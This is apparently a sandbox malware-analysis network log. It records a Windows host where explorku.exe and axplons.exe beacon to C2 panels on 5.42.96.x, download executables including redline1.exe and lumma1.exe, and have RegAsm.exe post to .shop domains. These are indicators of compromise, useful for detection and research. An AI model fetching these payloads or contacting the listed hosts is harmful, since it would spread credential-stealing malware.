  user-agent: WindowsShellClient/9.0.40929.0 (Windows)
  Response
  HTTP/2.0 204
  cache-control: no-cache, must-revalidate
  pragma: no-cache
  expires: Fri, 01 Jan 1990 00:00:00 GMT
  set-cookie: MUID=09CF9A125C726EDC1C088E6D5D926F31; domain=.bing.com; expires=Sun, 08-Jun-2025 18:01:05 GMT; path=/; SameSite=None; Secure; Priority=High;
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  access-control-allow-origin: *
  x-cache: CONFIG_NOCACHE
  accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  x-msedge-ref: Ref A: 0BB11B6AB44B4A74887A6D8EC763E412 Ref B: LON04EDGE1007 Ref C: 2024-05-14T18:01:05Z
  date: Tue, 14 May 2024 18:01:05 GMT
• US
  GET
  https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949
  Remote address: 204.79.197.237:443
  Request
  GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8W36in6Q1Dxk2EpiBs_O0BDVUCUxfGo3XAaKNEi_wkyv2N0ebkLUMNYBtLxA9sdd2ciHWl2M3ddOb8SosBw-ZgBdVgcMbYG0gmsbpYD97LKcXUPu75m4WLKdc9TE_IYfN-XD7TKzUAfGbj0Wg6TgN-VgF7kM0XyFoBAaUMO03svQvnYJl%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy54Ym94LmNvbSUyZmdhbWVzJTJmY2FsbC1vZi1kdXR5LW1vZGVybi13YXJmYXJlLWlpaSUzZm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX0NvRCUyNmZvcm0lM2RNNTAwNlg%26rlid%3De3355c6480e316b3768a3a4f2fb762d3&TIME=20240426T134311Z&CID=531035994&EID=&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949 HTTP/2.0
  host: g.bing.com
  accept-encoding: gzip, deflate
  user-agent: WindowsShellClient/9.0.40929.0 (Windows)
  cookie: MUID=09CF9A125C726EDC1C088E6D5D926F31; _EDGE_S=SID=3521D2BA8CF96B370943C6C58D806A82
  Response
  HTTP/2.0 204
  cache-control: no-cache, must-revalidate
  pragma: no-cache
  expires: Fri, 01 Jan 1990 00:00:00 GMT
  set-cookie: MSPTC=_Hg3lxl00HZWh1dOOWUGdh2_X-oU0PvKQ2hTPm9YAWU; domain=.bing.com; expires=Sun, 08-Jun-2025 18:01:06 GMT; path=/; Partitioned; secure; SameSite=None
  strict-transport-security: max-age=31536000; includeSubDomains; preload
  access-control-allow-origin: *
  x-cache: CONFIG_NOCACHE
  accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  x-msedge-ref: Ref A: F06A9B3BC70848C294E87DB2099AFE98 Ref B: LON04EDGE1007 Ref C: 2024-05-14T18:01:06Z
  date: Tue, 14 May 2024 18:01:05 GMT
• BE
  GET
  https://www.bing.com/aes/c.gif?RG=4faef17f38be412fa1aa6a1874b8b20c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T134311Z&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038
  Remote address: 88.221.83.193:443
  Request
  GET /aes/c.gif?RG=4faef17f38be412fa1aa6a1874b8b20c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T134311Z&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038 HTTP/2.0
  host: www.bing.com
  accept-encoding: gzip, deflate
  user-agent: WindowsShellClient/9.0.40929.0 (Windows)
  cookie: MUID=09CF9A125C726EDC1C088E6D5D926F31
  Response
  HTTP/2.0 200
  cache-control: private,no-store
  pragma: no-cache
  vary: Origin
  p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
  accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
  x-msedge-ref: Ref A: 2320BD19D8E74E2EB68F8ED06D9AAA52 Ref B: LON212050704007 Ref C: 2024-05-14T18:01:05Z
  content-length: 0
  date: Tue, 14 May 2024 18:01:05 GMT
  set-cookie: _EDGE_S=SID=3521D2BA8CF96B370943C6C58D806A82; path=/; httponly; domain=bing.com
  set-cookie: MUIDB=09CF9A125C726EDC1C088E6D5D926F31; path=/; httponly; expires=Sun, 08-Jun-2025 18:01:05 GMT
  alt-svc: h3=":443"; ma=93600
  x-cdn-traceid: 0.bd53dd58.1715709665.303eeb88
• US
  DNS
  196.249.167.52.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  196.249.167.52.in-addr.arpa IN PTR
  Response
• US
  DNS
  240.197.17.2.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  240.197.17.2.in-addr.arpa IN PTR
  Response
  240.197.17.2.in-addr.arpa IN PTR a2-17-197-240.deploy.static.akamaitechnologies.com
• US
  DNS
  237.197.79.204.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  237.197.79.204.in-addr.arpa IN PTR
  Response
• US
  DNS
  95.221.229.192.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  95.221.229.192.in-addr.arpa IN PTR
  Response
• US
  DNS
  14.160.190.20.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  14.160.190.20.in-addr.arpa IN PTR
  Response
• US
  DNS
  193.83.221.88.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
  193.83.221.88.in-addr.arpa IN PTR
  Response
  193.83.221.88.in-addr.arpa IN PTR a88-221-83-193.deploy.static.akamaitechnologies.com
• RU
  POST
  http://5.42.96.141/go34ko8/index.php
  explorku.exe
  Remote address: 5.42.96.141:80
  Request
  POST /go34ko8/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 5.42.96.141
  Content-Length: 4
  Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:07 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Refresh: 0; url = Login.php
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.141/go34ko8/index.php
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.141:80
                                                                                      Request
                                                                                      POST /go34ko8/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.141
                                                                                      Content-Length: 158
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:07 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      DNS
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.141:80
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:09 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      DNS
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.141:80
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:22 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      DNS
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.141:80
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:36 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-be
                                                                                      GET
                                                                                      https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90
                                                                                      Remote address:
                                                                                      88.221.83.193:443
                                                                                      Request
                                                                                      GET /th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90 HTTP/2.0
                                                                                      host: www.bing.com
                                                                                      accept: */*
                                                                                      cookie: MUID=09CF9A125C726EDC1C088E6D5D926F31; _EDGE_S=SID=3521D2BA8CF96B370943C6C58D806A82; MSPTC=_Hg3lxl00HZWh1dOOWUGdh2_X-oU0PvKQ2hTPm9YAWU; MUIDB=09CF9A125C726EDC1C088E6D5D926F31
                                                                                      accept-encoding: gzip, deflate, br
                                                                                      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                                                                                      Response
                                                                                      HTTP/2.0 200
                                                                                      cache-control: public, max-age=2592000
                                                                                      content-type: image/png
                                                                                      access-control-allow-origin: *
                                                                                      access-control-allow-headers: *
                                                                                      access-control-allow-methods: GET, POST, OPTIONS
                                                                                      timing-allow-origin: *
                                                                                      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
                                                                                      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                      content-length: 1107
                                                                                      date: Tue, 14 May 2024 18:01:07 GMT
                                                                                      alt-svc: h3=":443"; ma=93600
                                                                                      x-cdn-traceid: 0.bd53dd58.1715709667.303ef1a8
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://5.42.96.7/cost/sarra.exe
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      GET /cost/sarra.exe HTTP/1.1
                                                                                      Host: 5.42.96.7
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:07 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2464768
                                                                                      Last-Modified: Tue, 14 May 2024 17:57:12 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "6643a5f8-259c00"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://5.42.96.7/mine/amers.exe
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      GET /mine/amers.exe HTTP/1.1
                                                                                      Host: 5.42.96.7
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://5.42.96.7/cost/random.exe
                                                                                      explorku.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      GET /cost/random.exe HTTP/1.1
                                                                                      Host: 5.42.96.7
                                                                                    • flag-us
                                                                                      DNS
                                                                                      88.156.103.20.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      88.156.103.20.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      141.96.42.5.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      141.96.42.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      7.96.42.5.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      7.96.42.5.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      133.211.185.52.in-addr.arpa
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      133.211.185.52.in-addr.arpa
                                                                                      IN PTR
                                                                                      Response
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.7/zamo7h/index.php
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      POST /zamo7h/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.7
                                                                                      Content-Length: 4
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:25 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Refresh: 0; url = Login.php
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.7/zamo7h/index.php
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      POST /zamo7h/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.7
                                                                                      Content-Length: 158
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:25 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://5.42.96.7/lend/alex.exe
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      GET /lend/alex.exe HTTP/1.1
                                                                                      Host: 5.42.96.7
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:25 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 2831872
                                                                                      Last-Modified: Sat, 11 May 2024 20:05:26 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "663fcf86-2b3600"
                                                                                      Accept-Ranges: bytes
                                                                                    • flag-ru
                                                                                      POST
                                                                                      http://5.42.96.7/zamo7h/index.php
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      POST /zamo7h/index.php HTTP/1.1
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Host: 5.42.96.7
                                                                                      Content-Length: 31
                                                                                      Cache-Control: no-cache
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:29 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                    • flag-ru
                                                                                      GET
                                                                                      http://5.42.96.7/lend/gold.exe
                                                                                      axplons.exe
                                                                                      Remote address:
                                                                                      5.42.96.7:80
                                                                                      Request
                                                                                      GET /lend/gold.exe HTTP/1.1
                                                                                      Host: 5.42.96.7
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                      Date: Tue, 14 May 2024 18:01:29 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 412448
                                                                                      Last-Modified: Sat, 11 May 2024 20:05:30 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "663fcf8a-64b20"
    Accept-Ranges: bytes
• [RU] POST http://5.42.96.7/zamo7h/index.php (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    POST /zamo7h/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 5.42.96.7
    Content-Length: 31
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 14 May 2024 18:01:30 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
• [RU] GET http://5.42.96.7/lend/redline1.exe (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    GET /lend/redline1.exe HTTP/1.1
    Host: 5.42.96.7
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 14 May 2024 18:01:30 GMT
    Content-Type: application/octet-stream
    Content-Length: 311296
    Last-Modified: Sat, 11 May 2024 20:05:37 GMT
    Connection: keep-alive
    ETag: "663fcf91-4c000"
    Accept-Ranges: bytes
• [RU] POST http://5.42.96.7/zamo7h/index.php (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    POST /zamo7h/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 5.42.96.7
    Content-Length: 31
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 14 May 2024 18:01:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
• [RU] POST http://5.42.96.7/zamo7h/index.php (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    POST /zamo7h/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 5.42.96.7
    Content-Length: 31
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 14 May 2024 18:01:34 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
• [RU] GET http://5.42.96.7/lend/swizzhis.exe (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    GET /lend/swizzhis.exe HTTP/1.1
    Host: 5.42.96.7
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 14 May 2024 18:01:34 GMT
    Content-Type: application/octet-stream
    Content-Length: 1084416
    Last-Modified: Sat, 11 May 2024 20:43:13 GMT
    Connection: keep-alive
    ETag: "663fd861-108c00"
    Accept-Ranges: bytes
• [RU] POST http://5.42.96.7/zamo7h/index.php (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    POST /zamo7h/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 5.42.96.7
    Content-Length: 31
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 14 May 2024 18:01:36 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
• [RU] GET http://5.42.96.7/lend/lumma1.exe (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    GET /lend/lumma1.exe HTTP/1.1
    Host: 5.42.96.7
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 14 May 2024 18:01:36 GMT
    Content-Type: application/octet-stream
    Content-Length: 1274880
    Last-Modified: Sat, 11 May 2024 20:48:32 GMT
    Connection: keep-alive
    ETag: "663fd9a0-137400"
    Accept-Ranges: bytes
• [RU] POST http://5.42.96.7/zamo7h/index.php (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    POST /zamo7h/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 5.42.96.7
    Content-Length: 31
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 14 May 2024 18:01:39 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
• [RU] POST http://5.42.96.7/zamo7h/index.php (axplons.exe)
  Remote address: 5.42.96.7:80
  Request
    POST /zamo7h/index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Host: 5.42.96.7
    Content-Length: 31
    Cache-Control: no-cache
  Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0 (Ubuntu)
    Date: Tue, 14 May 2024 18:01:40 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
• [US] DNS 228.249.119.40.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    228.249.119.40.in-addr.arpa IN PTR
  Response
• [US] DNS zippyfinickysofwps.shop (RegAsm.exe)
  Remote address: 8.8.8.8:53
  Request
    zippyfinickysofwps.shop IN A
  Response
    zippyfinickysofwps.shop IN A 104.21.39.216
    zippyfinickysofwps.shop IN A 172.67.148.231
• [US] POST https://zippyfinickysofwps.shop/api (RegAsm.exe)
  Remote address: 104.21.39.216:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: zippyfinickysofwps.shop
  Response
    HTTP/1.1 200 OK
    Date: Tue, 14 May 2024 18:01:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=c3uja3c4omjs0bdbs4cpbj1ffg; expires=Sat, 07-Sep-2024 11:48:10 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tCqcBJFPzi4qdWTqVp6B8QdXgZu5VObY0HUF8Xd2K9RXNgStk2s3myWGWMv%2FhJfFJecvO5%2FWVijSzK0kqpgN%2BLoAj51yA93F6ru2eHl8q%2B8MUkSW8rzxyU6Fx4pIZhgrxyH8X1vxWiDI3g%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 883ccb41ecaf954a-LHR
    alt-svc: h3=":443"; ma=86400
• [US] POST https://zippyfinickysofwps.shop/api (RegAsm.exe)
  Remote address: 104.21.39.216:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: zippyfinickysofwps.shop
  Response
    HTTP/1.1 200 OK
    Date: Tue, 14 May 2024 18:01:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=2hame4c594bbqr6ids7saedv1h; expires=Sat, 07-Sep-2024 11:48:11 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KUPDQqxMHjRjyQD7jA4GmokSn0XudCfVujhDGvDcnpgQFmJLcArizqdGJlbCroDWv%2F%2BPOiJk8hS%2FCcbzAHMwEkdPXdOUsQxxCoDf6x0pD89QwN%2F978O1t4OkYMAQa6RM5IF4OTb73l67Sw%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 883ccb4a4a0c954a-LHR
    alt-svc: h3=":443"; ma=86400
• [US] DNS acceptabledcooeprs.shop (RegAsm.exe)
  Remote address: 8.8.8.8:53
  Request
    acceptabledcooeprs.shop IN A
  Response
    acceptabledcooeprs.shop IN A 188.114.97.2
    acceptabledcooeprs.shop IN A 188.114.96.2
• [US] POST https://acceptabledcooeprs.shop/api (RegAsm.exe)
  Remote address: 188.114.97.2:443
  Request
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: acceptabledcooeprs.shop
  Response
    HTTP/1.1 200 OK
    Date: Tue, 14 May 2024 18:01:31 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=jcbauri6pn1qi47lr33ggjshkj; expires=Sat, 07-Sep-2024 11:48:10 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SfzamfhLHgTakeO4OmUvZGNPJg3oVzDWdsGMzO%2FSKyXXqFuGPsejo2Nc5F4C0tdT6mxGAd%2BnNG5iWM96lma6F38QDzugM6bm%2BSOUFSuj5Ki9WerAYdU7nZJXIi4uJqBRgAMubFT9f8jGNA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 883ccb453d649430-LHR
    alt-svc: h3=":443"; ma=86400
• [US] DNS 216.39.21.104.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    216.39.21.104.in-addr.arpa IN PTR
  Response
• [US] DNS 2.97.114.188.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    2.97.114.188.in-addr.arpa IN PTR
  Response
• [US] DNS 33.128.172.185.in-addr.arpa
  Remote address: 8.8.8.8:53
  Request
    33.128.172.185.in-addr.arpa IN PTR
                                                                                      Response
                                                                                    • flag-us
                                                                                      DNS
                                                                                      obsceneclassyjuwks.shop
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      8.8.8.8:53
                                                                                      Request
                                                                                      obsceneclassyjuwks.shop
                                                                                      IN A
                                                                                      Response
                                                                                      obsceneclassyjuwks.shop
                                                                                      IN A
                                                                                      104.21.20.88
                                                                                      obsceneclassyjuwks.shop
                                                                                      IN A
                                                                                      172.67.192.5
                                                                                    • flag-us
                                                                                      POST
                                                                                      https://obsceneclassyjuwks.shop/api
                                                                                      RegAsm.exe
                                                                                      Remote address:
                                                                                      104.21.20.88:443
                                                                                      Request
                                                                                      POST /api HTTP/1.1
                                                                                      Connection: Keep-Alive
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                      Content-Length: 8
                                                                                      Host: obsceneclassyjuwks.shop
                                                                                      Response
                                                                                      HTTP/1.1 200 OK
                                                                                      Date: Tue, 14 May 2024 18:01:32 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Set-Cookie: PHPSESSID=2n9j2io74jqq3o2gfnpsrmseoa; expires=Sat, 07-Sep-2024 11:48:11 GMT; Max-Age=9999999; path=/
                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                      Pragma: no-cache
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1JMAqHWXcfqArt%2FLKpWWa0SeCjxKjNh%2F%2F8cpU27bPrksknr6mhkKlIzB08VMMVgw9mPgT%2F%2B%2Bf%2F9Y8NKLYttQgh6KWoEw10TYp9s0TfxBdB8ak%2BGh%2FD9UKA3uLyoRxbtMny47Fuqlb%2Bfpw%3D%3D"}],"group":"cf-nel","max_age":604800}
